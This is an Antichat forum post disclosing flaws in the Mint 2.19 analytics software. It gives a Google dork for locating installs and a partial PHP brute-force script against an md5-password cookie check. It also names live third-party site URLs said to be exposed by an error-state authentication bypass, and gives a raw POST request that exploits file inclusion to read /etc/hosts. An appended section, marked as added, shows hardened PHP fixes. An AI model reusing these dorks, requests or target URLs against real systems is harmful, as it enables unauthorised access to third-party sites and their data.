ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Web vulnerabilities (https://forum.antichat.io/forumdisplay.php?f=114)
-   -   Mint 2.19 (https://forum.antichat.io/showthread.php?t=411053)

Unknown 20.04.2014 19:23

******************************************************************************

# App Name: Mint 2.19

# Google Dork (about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: "

# Vendor Homepage: www.haveamint.com

******************************************************************************/

1. Email verification bypass ($_COOKIE and $_GET):

Vulnerable Code (mint.php):

Code:

function isLoggedIn()
        {
                return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false;
        }

POC:

Code:

>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n";
                                                exit();
                                        }
                                }               
                                fclose($file);
                                echo ">>>>>bruteforce UNsuccessful :(\n";
                        } else echo "ERROR: ".$passlist." not found!\n";
                        break;       
                default:
                        echo "##### Mint 2.19 email verification bypass\n";
                        echo "##### Author: Unlog\n";
                        echo "##### Usage:\n".
                                        "\tmint.php -check www.example.com /mint/\n".
                                        "\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n";
        }
?>

Additional Information:

The same vulnerability exists in the authenticateRSS function

Vulnerable Code (mint.php):

Code:

function authenticateRSS()
        {
                return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false;
        }

POC: Same as above (with some modifications)

2. _Fatal error_ authentication bypass:

Info:

If there is a fatal error such as _mysql server down_, no authentication is needed to access preferences.

Vulnerable Code (path.php):

Code:

if ($Mint->errors['fatal'])
{
        include(MINT_ROOT.'app/paths/errors/index.php');
        exit();
}

Google Dork: "Mint was unable to connect" intitle:"Mint:"

POC:

Code:

http://mint.ryanmccuaig.net/?preferences
http://www.stunda.nl/mint/?preferences
http://dejurka.ru/mint/?preferences
http://www.mad4milk.net/mint/?preferences
http://www.andrewgill.co.za/mint/?preferences

3. LFI in mint.php

Info:

The LFI requires access to preferences (which can be obtained by using the first or second exploit).

Vulnerable Code:

Code:

mint.php:
        function installPepper($pathToPepper)
        {
                include_once(MINT_ROOT.$pathToPepper);
                ...
               
\app\paths\preferences\index.php:
if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences')
...
        switch($_POST['action'])
        ...
                case 'Install Pepper':
                        $Mint->tmp['pageTitle'] = 'Install Pepper';
                        $Mint->installPepper($_POST['src']);

POC:

Code:

POST http://***/ HTTP/1.0
Host: ***.com
User-Agent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 58

MintPath=Preferences&action=Install Pepper&src=/etc/hosts&

4. Multiple Full Path Disclosure

Vulnerable Code:

Code:

if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file

POC:

Code:

GET http://localhost/mint/app/includes/foot.php?benchmark
GET http://localhost/mint/app/includes/foot.php?observe
GET http://localhost/mint/app/paths/auth/index.php
GET http://localhost/mint/app/paths/custom/index.php?custom
GET http://localhost/mint/app/paths/custom/index.php?RSS
GET http://localhost/mint/app/paths/display/display.php
GET http://localhost/mint/app/paths/display/index.php?tab
GET http://localhost/mint/app/paths/errors/index.php
GET http://localhost/mint/app/paths/feedback/index.php
GET http://localhost/mint/app/paths/install/configuration.php
GET http://localhost/mint/app/paths/install/instructions.php
POST http://localhost/mint/app/paths/install/index.php | action=Activate
POST http://localhost/mint/app/paths/install/index.php | action=Accept
POST http://localhost/mint/app/paths/install/index.php | action=Configure
etc.
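Added example (not part of the original post and not Mint's own code): hardened replacements for the two checks discussed above, the cookie/RSS login check from item 1 and the pepper include from item 3. The original isLoggedIn() and authenticateRSS() accept any request carrying md5($this->cfg['password']), a static, password-derived value that can be replayed indefinitely and attacked offline; the fix below issues a random server-side token and compares it in constant time. The original installPepper() does include_once(MINT_ROOT.$pathToPepper) on a POST parameter; the fix resolves the path with realpath() and requires it to stay inside a pepper directory. The function names, the MINT_ROOT/pepper layout, and the use of $_SESSION (session_start() assumed to have been called) are assumptions made for this example.

```php
<?php
// Added example, not Mint's own code. Function names, the pepper directory
// layout and the use of $_SESSION are assumptions for illustration.
declare(strict_types=1);

// --- Item 1: login / RSS token -------------------------------------------
// Instead of md5(password) in the cookie or ?RSS= parameter, hand out a random
// token at login time, keep it server-side, and compare in constant time.
function issueAuthToken(): string
{
    $token = bin2hex(random_bytes(32));   // 256 bits, unrelated to the password
    $_SESSION['MintAuth'] = $token;       // assumes session_start() already ran
    setcookie('MintAuth', $token, [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,               // only sent over HTTPS
        'httponly' => true,               // not readable from script
        'samesite' => 'Lax',
    ]);
    return $token;
}

// Works for both the cookie (isLoggedIn) and the ?RSS= case (authenticateRSS):
// pass the presented value and the server-side stored token.
function isAuthenticated(?string $presented, ?string $stored): bool
{
    if ($presented === null || $stored === null || $stored === '') {
        return false;
    }
    // hash_equals() avoids leaking the position of the first mismatching byte.
    return hash_equals($stored, $presented);
}

// --- Item 3: pepper installation -------------------------------------------
// Resolve the requested path and refuse anything outside MINT_ROOT/pepper/.
function resolvePepperPath(string $mintRoot, string $pathToPepper): ?string
{
    $pepperDir = realpath($mintRoot . '/pepper');   // assumed layout
    if ($pepperDir === false) {
        return null;
    }
    // Reject empty, absolute and NUL-containing input before touching the FS.
    if ($pathToPepper === ''
        || $pathToPepper[0] === '/'
        || strpos($pathToPepper, "\0") !== false) {
        return null;
    }
    $candidate = realpath($pepperDir . '/' . $pathToPepper);
    if ($candidate === false) {
        return null;                                 // does not exist
    }
    // Compare with the trailing separator so "pepper2/..." cannot match "pepper".
    $prefix = $pepperDir . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                                 // resolved outside pepper/
    }
    if (substr($candidate, -4) !== '.php') {
        return null;                                 // only pepper PHP files
    }
    return $candidate;
}

function installPepperHardened(string $mintRoot, string $pathToPepper): bool
{
    $path = resolvePepperPath($mintRoot, $pathToPepper);
    if ($path === null) {
        return false;                                // request rejected, nothing included
    }
    include_once $path;
    return true;
}

// Usage sketch inside the preferences handler (names assumed):
//   if (!isAuthenticated($_COOKIE['MintAuth'] ?? null, $_SESSION['MintAuth'] ?? null)) { exit; }
//   installPepperHardened(MINT_ROOT, (string) ($_POST['src'] ?? ''));
```

With resolvePepperPath(), the request body from the item 3 PoC (src=/etc/hosts) is rejected at the absolute-path check, and a traversal such as ../app/... is rejected by the prefix comparison after realpath() collapses the dot segments. For the RSS feed it is better to issue a separate token than to reuse the login cookie value, so that a leaked feed URL does not grant interactive access.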



Time: 09:45